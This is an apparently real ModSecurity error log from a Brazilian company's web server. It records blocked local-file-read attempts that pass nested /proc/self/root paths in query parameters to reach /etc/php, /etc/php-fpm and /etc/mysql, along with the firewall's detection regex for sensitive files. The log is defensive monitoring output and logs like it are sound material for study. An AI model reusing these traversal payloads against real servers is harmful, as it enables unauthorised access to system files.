[Wed Mar 18 03:43:03.363061 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:47396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJd9a6ubjKNq_cu4ZU1AAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:43:04.740882 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:48750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJeOoXxyEfFpUF8f8rgQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:43:11.920950 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:48764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJf0zinOy1jxa1j4fQjwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:43:14.341541 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:52950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJgvu8EFLIOrSqIpvFNwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:17.973354 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:52956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJhQkwaGbbGflqUZDRlgAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:19.322399 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:52964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJh9Y0UrI5A3LftIxPrwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:43:20.675307 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:57570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJiOyqAr6etmhZHNp2_wAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:43:24.299394 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:57582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJjEzinOy1jxa1j4fQkgAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:43:32.211145 2026] [access_compat:error] [pid 26799:tid 140411574073088] [client 216.73.216.191:48558] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Wed Mar 18 03:43:35.753035 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:57590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJl-w_le52K8_3pV2ezQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:36.786598 2026] [:error] [pid 19507:tid 140411616036608] [client 216.73.216.191:31536] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJmNY0UrI5A3LftIxPuwAAAY8"]
[Wed Mar 18 03:43:40.568386 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:60862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJnOoXxyEfFpUF8f8rmQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:43:44.161206 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:41334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJoMdf6f5d65gmYZSPLgAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:43:45.500342 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:41350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJoSmAPhZkrhU8w4ksfgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:51.155634 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:41358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJp-w_le52K8_3pV2e1gAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:52.474235 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:34638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJqEzinOy1jxa1j4fQoQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:53.793193 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:34650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJqfu8EFLIOrSqIpvFRwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:58.465538 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:34652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJrta6ubjKNq_cu4ZVAQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:43:59.769606 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:42974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJr-yqAr6etmhZHNp3EAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:03.351006 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:42984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJsymAPhZkrhU8w4kshAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:05.730623 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:42992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJtew_le52K8_3pV2e2AAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:44:08.162055 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:42996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJuMdf6f5d65gmYZSPRwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:08.595062 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:53516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJuMdf6f5d65gmYZSPSQAAAtE"], referer: 